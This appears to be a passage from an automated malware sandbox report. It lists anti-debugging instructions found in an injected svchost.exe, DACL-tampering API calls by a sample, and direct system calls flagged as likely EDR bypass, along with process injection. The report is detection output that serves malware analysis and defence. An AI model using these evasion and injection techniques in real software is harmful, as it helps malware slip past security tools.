Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03502B57 mov eax, dword ptr fs:[00000030h]	2_2_03502B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03502B57 mov eax, dword ptr fs:[00000030h]	2_2_03502B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03502B57 mov eax, dword ptr fs:[00000030h]	2_2_03502B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03502B57 mov eax, dword ptr fs:[00000030h]	2_2_03502B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C6B40 mov eax, dword ptr fs:[00000030h]	2_2_034C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C6B40 mov eax, dword ptr fs:[00000030h]	2_2_034C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034FAB40 mov eax, dword ptr fs:[00000030h]	2_2_034FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D8B42 mov eax, dword ptr fs:[00000030h]	2_2_034D8B42
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03428B50 mov eax, dword ptr fs:[00000030h]	2_2_03428B50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DEB50 mov eax, dword ptr fs:[00000030h]	2_2_034DEB50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342CB7E mov eax, dword ptr fs:[00000030h]	2_2_0342CB7E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03504B00 mov eax, dword ptr fs:[00000030h]	2_2_03504B00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]	2_2_034AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]	2_2_034AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]	2_2_034AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]	2_2_034AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]	2_2_034AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]	2_2_034AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]	2_2_034AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]	2_2_034AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]	2_2_034AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345EB20 mov eax, dword ptr fs:[00000030h]	2_2_0345EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345EB20 mov eax, dword ptr fs:[00000030h]	2_2_0345EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F8B28 mov eax, dword ptr fs:[00000030h]	2_2_034F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F8B28 mov eax, dword ptr fs:[00000030h]	2_2_034F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03450BCB mov eax, dword ptr fs:[00000030h]	2_2_03450BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03450BCB mov eax, dword ptr fs:[00000030h]	2_2_03450BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03450BCB mov eax, dword ptr fs:[00000030h]	2_2_03450BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03430BCD mov eax, dword ptr fs:[00000030h]	2_2_03430BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03430BCD mov eax, dword ptr fs:[00000030h]	2_2_03430BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03430BCD mov eax, dword ptr fs:[00000030h]	2_2_03430BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DEBD0 mov eax, dword ptr fs:[00000030h]	2_2_034DEBD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03438BF0 mov eax, dword ptr fs:[00000030h]	2_2_03438BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03438BF0 mov eax, dword ptr fs:[00000030h]	2_2_03438BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03438BF0 mov eax, dword ptr fs:[00000030h]	2_2_03438BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345EBFC mov eax, dword ptr fs:[00000030h]	2_2_0345EBFC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034BCBF0 mov eax, dword ptr fs:[00000030h]	2_2_034BCBF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440BBE mov eax, dword ptr fs:[00000030h]	2_2_03440BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440BBE mov eax, dword ptr fs:[00000030h]	2_2_03440BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E4BB0 mov eax, dword ptr fs:[00000030h]	2_2_034E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E4BB0 mov eax, dword ptr fs:[00000030h]	2_2_034E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]	2_2_03436A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]	2_2_03436A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]	2_2_03436A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]	2_2_03436A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]	2_2_03436A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]	2_2_03436A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]	2_2_03436A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440A5B mov eax, dword ptr fs:[00000030h]	2_2_03440A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440A5B mov eax, dword ptr fs:[00000030h]	2_2_03440A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346CA6F mov eax, dword ptr fs:[00000030h]	2_2_0346CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346CA6F mov eax, dword ptr fs:[00000030h]	2_2_0346CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346CA6F mov eax, dword ptr fs:[00000030h]	2_2_0346CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DEA60 mov eax, dword ptr fs:[00000030h]	2_2_034DEA60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034ACA72 mov eax, dword ptr fs:[00000030h]	2_2_034ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034ACA72 mov eax, dword ptr fs:[00000030h]	2_2_034ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034BCA11 mov eax, dword ptr fs:[00000030h]	2_2_034BCA11
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346CA24 mov eax, dword ptr fs:[00000030h]	2_2_0346CA24
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345EA2E mov eax, dword ptr fs:[00000030h]	2_2_0345EA2E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03454A35 mov eax, dword ptr fs:[00000030h]	2_2_03454A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03454A35 mov eax, dword ptr fs:[00000030h]	2_2_03454A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03486ACC mov eax, dword ptr fs:[00000030h]	2_2_03486ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03486ACC mov eax, dword ptr fs:[00000030h]	2_2_03486ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03486ACC mov eax, dword ptr fs:[00000030h]	2_2_03486ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03430AD0 mov eax, dword ptr fs:[00000030h]	2_2_03430AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03464AD0 mov eax, dword ptr fs:[00000030h]	2_2_03464AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03464AD0 mov eax, dword ptr fs:[00000030h]	2_2_03464AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346AAEE mov eax, dword ptr fs:[00000030h]	2_2_0346AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346AAEE mov eax, dword ptr fs:[00000030h]	2_2_0346AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]	2_2_0343EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]	2_2_0343EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]	2_2_0343EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]	2_2_0343EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]	2_2_0343EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]	2_2_0343EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]	2_2_0343EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]	2_2_0343EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]	2_2_0343EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03504A80 mov eax, dword ptr fs:[00000030h]	2_2_03504A80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03468A90 mov edx, dword ptr fs:[00000030h]	2_2_03468A90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03438AA0 mov eax, dword ptr fs:[00000030h]	2_2_03438AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03438AA0 mov eax, dword ptr fs:[00000030h]	2_2_03438AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03486AA4 mov eax, dword ptr fs:[00000030h]	2_2_03486AA4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B0946 mov eax, dword ptr fs:[00000030h]	2_2_034B0946
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03504940 mov eax, dword ptr fs:[00000030h]	2_2_03504940
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03456962 mov eax, dword ptr fs:[00000030h]	2_2_03456962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03456962 mov eax, dword ptr fs:[00000030h]	2_2_03456962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03456962 mov eax, dword ptr fs:[00000030h]	2_2_03456962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0347096E mov eax, dword ptr fs:[00000030h]	2_2_0347096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0347096E mov edx, dword ptr fs:[00000030h]	2_2_0347096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0347096E mov eax, dword ptr fs:[00000030h]	2_2_0347096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D4978 mov eax, dword ptr fs:[00000030h]	2_2_034D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D4978 mov eax, dword ptr fs:[00000030h]	2_2_034D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034BC97C mov eax, dword ptr fs:[00000030h]	2_2_034BC97C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AE908 mov eax, dword ptr fs:[00000030h]	2_2_034AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AE908 mov eax, dword ptr fs:[00000030h]	2_2_034AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034BC912 mov eax, dword ptr fs:[00000030h]	2_2_034BC912
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03428918 mov eax, dword ptr fs:[00000030h]	2_2_03428918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03428918 mov eax, dword ptr fs:[00000030h]	2_2_03428918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B892A mov eax, dword ptr fs:[00000030h]	2_2_034B892A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C892B mov eax, dword ptr fs:[00000030h]	2_2_034C892B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C69C0 mov eax, dword ptr fs:[00000030h]	2_2_034C69C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0343A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0343A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0343A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0343A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0343A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0343A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034649D0 mov eax, dword ptr fs:[00000030h]	2_2_034649D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034FA9D3 mov eax, dword ptr fs:[00000030h]	2_2_034FA9D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034BE9E0 mov eax, dword ptr fs:[00000030h]	2_2_034BE9E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034629F9 mov eax, dword ptr fs:[00000030h]	2_2_034629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034629F9 mov eax, dword ptr fs:[00000030h]	2_2_034629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]	2_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]	2_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]	2_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]	2_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]	2_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]	2_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]	2_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]	2_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]	2_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]	2_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]	2_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]	2_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]	2_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034309AD mov eax, dword ptr fs:[00000030h]	2_2_034309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034309AD mov eax, dword ptr fs:[00000030h]	2_2_034309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B89B3 mov esi, dword ptr fs:[00000030h]	2_2_034B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B89B3 mov eax, dword ptr fs:[00000030h]	2_2_034B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B89B3 mov eax, dword ptr fs:[00000030h]	2_2_034B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03442840 mov ecx, dword ptr fs:[00000030h]	2_2_03442840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03460854 mov eax, dword ptr fs:[00000030h]	2_2_03460854
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03434859 mov eax, dword ptr fs:[00000030h]	2_2_03434859
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03434859 mov eax, dword ptr fs:[00000030h]	2_2_03434859
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034BE872 mov eax, dword ptr fs:[00000030h]	2_2_034BE872
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034BE872 mov eax, dword ptr fs:[00000030h]	2_2_034BE872
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C6870 mov eax, dword ptr fs:[00000030h]	2_2_034C6870
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C6870 mov eax, dword ptr fs:[00000030h]	2_2_034C6870
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034BC810 mov eax, dword ptr fs:[00000030h]	2_2_034BC810
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03452835 mov eax, dword ptr fs:[00000030h]	2_2_03452835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03452835 mov eax, dword ptr fs:[00000030h]	2_2_03452835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03452835 mov eax, dword ptr fs:[00000030h]	2_2_03452835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03452835 mov ecx, dword ptr fs:[00000030h]	2_2_03452835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03452835 mov eax, dword ptr fs:[00000030h]	2_2_03452835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03452835 mov eax, dword ptr fs:[00000030h]	2_2_03452835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346A830 mov eax, dword ptr fs:[00000030h]	2_2_0346A830
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D483A mov eax, dword ptr fs:[00000030h]	2_2_034D483A

Source: C:\Users\user\Desktop\N2sgk6jMa2.exe

Code function: 0_2_00D581F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

0_2_00D581F7

Source: C:\Users\user\Desktop\N2sgk6jMa2.exe	Code function: 0_2_00D2A395 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00D2A395
Source: C:\Users\user\Desktop\N2sgk6jMa2.exe	Code function: 0_2_00D2A364 SetUnhandledExceptionFilter,	0_2_00D2A364
Source: C:\Users\user\AppData\Local\directory\.exe	Code function: 1_2_00B5A395 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_00B5A395
Source: C:\Users\user\AppData\Local\directory\.exe	Code function: 1_2_00B5A364 SetUnhandledExceptionFilter,	1_2_00B5A364

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\VWGQPjLsoLsAJsTOCmYZmjmrRyBuclcNjqYyCppVtsiRZUjzJIxBPXUQlXUlWw\fIuefTlcmxsHvlw.exe	NtWriteVirtualMemory: Direct from: 0x76F0490C	Jump to behavior
Source: C:\Program Files (x86)\VWGQPjLsoLsAJsTOCmYZmjmrRyBuclcNjqYyCppVtsiRZUjzJIxBPXUQlXUlWw\fIuefTlcmxsHvlw.exe	NtAllocateVirtualMemory: Direct from: 0x76F03C9C	Jump to behavior
Source: C:\Program Files (x86)\VWGQPjLsoLsAJsTOCmYZmjmrRyBuclcNjqYyCppVtsiRZUjzJIxBPXUQlXUlWw\fIuefTlcmxsHvlw.exe	NtClose: Direct from: 0x76F02B6C
Source: C:\Program Files (x86)\VWGQPjLsoLsAJsTOCmYZmjmrRyBuclcNjqYyCppVtsiRZUjzJIxBPXUQlXUlWw\fIuefTlcmxsHvlw.exe	NtReadVirtualMemory: Direct from: 0x76F02E8C	Jump to behavior
Source: C:\Program Files (x86)\VWGQPjLsoLsAJsTOCmYZmjmrRyBuclcNjqYyCppVtsiRZUjzJIxBPXUQlXUlWw\fIuefTlcmxsHvlw.exe	NtCreateKey: Direct from: 0x76F02C6C	Jump to behavior
Source: C:\Program Files (x86)\VWGQPjLsoLsAJsTOCmYZmjmrRyBuclcNjqYyCppVtsiRZUjzJIxBPXUQlXUlWw\fIuefTlcmxsHvlw.exe	NtSetInformationThread: Direct from: 0x76F02B4C	Jump to behavior
Source: C:\Program Files (x86)\VWGQPjLsoLsAJsTOCmYZmjmrRyBuclcNjqYyCppVtsiRZUjzJIxBPXUQlXUlWw\fIuefTlcmxsHvlw.exe	NtQueryAttributesFile: Direct from: 0x76F02E6C	Jump to behavior
Source: C:\Program Files (x86)\VWGQPjLsoLsAJsTOCmYZmjmrRyBuclcNjqYyCppVtsiRZUjzJIxBPXUQlXUlWw\fIuefTlcmxsHvlw.exe	NtAllocateVirtualMemory: Direct from: 0x76F048EC	Jump to behavior
Source: C:\Program Files (x86)\VWGQPjLsoLsAJsTOCmYZmjmrRyBuclcNjqYyCppVtsiRZUjzJIxBPXUQlXUlWw\fIuefTlcmxsHvlw.exe	NtQuerySystemInformation: Direct from: 0x76F048CC	Jump to behavior
Source: C:\Program Files (x86)\VWGQPjLsoLsAJsTOCmYZmjmrRyBuclcNjqYyCppVtsiRZUjzJIxBPXUQlXUlWw\fIuefTlcmxsHvlw.exe	NtQueryVolumeInformationFile: Direct from: 0x76F02F2C	Jump to behavior
Source: C:\Program Files (x86)\VWGQPjLsoLsAJsTOCmYZmjmrRyBuclcNjqYyCppVtsiRZUjzJIxBPXUQlXUlWw\fIuefTlcmxsHvlw.exe	NtOpenSection: Direct from: 0x76F02E0C	Jump to behavior
Source: C:\Program Files (x86)\VWGQPjLsoLsAJsTOCmYZmjmrRyBuclcNjqYyCppVtsiRZUjzJIxBPXUQlXUlWw\fIuefTlcmxsHvlw.exe	NtSetInformationThread: Direct from: 0x76EF63F9	Jump to behavior
Source: C:\Program Files (x86)\VWGQPjLsoLsAJsTOCmYZmjmrRyBuclcNjqYyCppVtsiRZUjzJIxBPXUQlXUlWw\fIuefTlcmxsHvlw.exe	NtDeviceIoControlFile: Direct from: 0x76F02AEC	Jump to behavior
Source: C:\Program Files (x86)\VWGQPjLsoLsAJsTOCmYZmjmrRyBuclcNjqYyCppVtsiRZUjzJIxBPXUQlXUlWw\fIuefTlcmxsHvlw.exe	NtAllocateVirtualMemory: Direct from: 0x76F02BEC	Jump to behavior
Source: C:\Program Files (x86)\VWGQPjLsoLsAJsTOCmYZmjmrRyBuclcNjqYyCppVtsiRZUjzJIxBPXUQlXUlWw\fIuefTlcmxsHvlw.exe	NtCreateFile: Direct from: 0x76F02FEC	Jump to behavior
Source: C:\Program Files (x86)\VWGQPjLsoLsAJsTOCmYZmjmrRyBuclcNjqYyCppVtsiRZUjzJIxBPXUQlXUlWw\fIuefTlcmxsHvlw.exe	NtOpenFile: Direct from: 0x76F02DCC	Jump to behavior
Source: C:\Program Files (x86)\VWGQPjLsoLsAJsTOCmYZmjmrRyBuclcNjqYyCppVtsiRZUjzJIxBPXUQlXUlWw\fIuefTlcmxsHvlw.exe	NtQueryInformationToken: Direct from: 0x76F02CAC	Jump to behavior
Source: C:\Program Files (x86)\VWGQPjLsoLsAJsTOCmYZmjmrRyBuclcNjqYyCppVtsiRZUjzJIxBPXUQlXUlWw\fIuefTlcmxsHvlw.exe	NtTerminateThread: Direct from: 0x76F02FCC	Jump to behavior
Source: C:\Program Files (x86)\VWGQPjLsoLsAJsTOCmYZmjmrRyBuclcNjqYyCppVtsiRZUjzJIxBPXUQlXUlWw\fIuefTlcmxsHvlw.exe	NtProtectVirtualMemory: Direct from: 0x76EF7B2E	Jump to behavior
Source: C:\Program Files (x86)\VWGQPjLsoLsAJsTOCmYZmjmrRyBuclcNjqYyCppVtsiRZUjzJIxBPXUQlXUlWw\fIuefTlcmxsHvlw.exe	NtOpenKeyEx: Direct from: 0x76F02B9C	Jump to behavior
Source: C:\Program Files (x86)\VWGQPjLsoLsAJsTOCmYZmjmrRyBuclcNjqYyCppVtsiRZUjzJIxBPXUQlXUlWw\fIuefTlcmxsHvlw.exe	NtProtectVirtualMemory: Direct from: 0x76F02F9C	Jump to behavior
Source: C:\Program Files (x86)\VWGQPjLsoLsAJsTOCmYZmjmrRyBuclcNjqYyCppVtsiRZUjzJIxBPXUQlXUlWw\fIuefTlcmxsHvlw.exe	NtSetInformationProcess: Direct from: 0x76F02C5C	Jump to behavior
Source: C:\Program Files (x86)\VWGQPjLsoLsAJsTOCmYZmjmrRyBuclcNjqYyCppVtsiRZUjzJIxBPXUQlXUlWw\fIuefTlcmxsHvlw.exe	NtNotifyChangeKey: Direct from: 0x76F03C2C	Jump to behavior
Source: C:\Program Files (x86)\VWGQPjLsoLsAJsTOCmYZmjmrRyBuclcNjqYyCppVtsiRZUjzJIxBPXUQlXUlWw\fIuefTlcmxsHvlw.exe	NtCreateMutant: Direct from: 0x76F035CC	Jump to behavior
Source: C:\Program Files (x86)\VWGQPjLsoLsAJsTOCmYZmjmrRyBuclcNjqYyCppVtsiRZUjzJIxBPXUQlXUlWw\fIuefTlcmxsHvlw.exe	NtWriteVirtualMemory: Direct from: 0x76F02E3C	Jump to behavior
Source: C:\Program Files (x86)\VWGQPjLsoLsAJsTOCmYZmjmrRyBuclcNjqYyCppVtsiRZUjzJIxBPXUQlXUlWw\fIuefTlcmxsHvlw.exe	NtMapViewOfSection: Direct from: 0x76F02D1C	Jump to behavior
Source: C:\Program Files (x86)\VWGQPjLsoLsAJsTOCmYZmjmrRyBuclcNjqYyCppVtsiRZUjzJIxBPXUQlXUlWw\fIuefTlcmxsHvlw.exe	NtResumeThread: Direct from: 0x76F036AC	Jump to behavior
Source: C:\Program Files (x86)\VWGQPjLsoLsAJsTOCmYZmjmrRyBuclcNjqYyCppVtsiRZUjzJIxBPXUQlXUlWw\fIuefTlcmxsHvlw.exe	NtAllocateVirtualMemory: Direct from: 0x76F02BFC	Jump to behavior
Source: C:\Program Files (x86)\VWGQPjLsoLsAJsTOCmYZmjmrRyBuclcNjqYyCppVtsiRZUjzJIxBPXUQlXUlWw\fIuefTlcmxsHvlw.exe	NtReadFile: Direct from: 0x76F02ADC	Jump to behavior
Source: C:\Program Files (x86)\VWGQPjLsoLsAJsTOCmYZmjmrRyBuclcNjqYyCppVtsiRZUjzJIxBPXUQlXUlWw\fIuefTlcmxsHvlw.exe	NtQuerySystemInformation: Direct from: 0x76F02DFC	Jump to behavior
Source: C:\Program Files (x86)\VWGQPjLsoLsAJsTOCmYZmjmrRyBuclcNjqYyCppVtsiRZUjzJIxBPXUQlXUlWw\fIuefTlcmxsHvlw.exe	NtDelayExecution: Direct from: 0x76F02DDC	Jump to behavior
Source: C:\Program Files (x86)\VWGQPjLsoLsAJsTOCmYZmjmrRyBuclcNjqYyCppVtsiRZUjzJIxBPXUQlXUlWw\fIuefTlcmxsHvlw.exe	NtQueryInformationProcess: Direct from: 0x76F02C26	Jump to behavior
Source: C:\Program Files (x86)\VWGQPjLsoLsAJsTOCmYZmjmrRyBuclcNjqYyCppVtsiRZUjzJIxBPXUQlXUlWw\fIuefTlcmxsHvlw.exe	NtResumeThread: Direct from: 0x76F02FBC	Jump to behavior
Source: C:\Program Files (x86)\VWGQPjLsoLsAJsTOCmYZmjmrRyBuclcNjqYyCppVtsiRZUjzJIxBPXUQlXUlWw\fIuefTlcmxsHvlw.exe	NtCreateUserProcess: Direct from: 0x76F0371C	Jump to behavior

Maps a DLL or memory area into another process

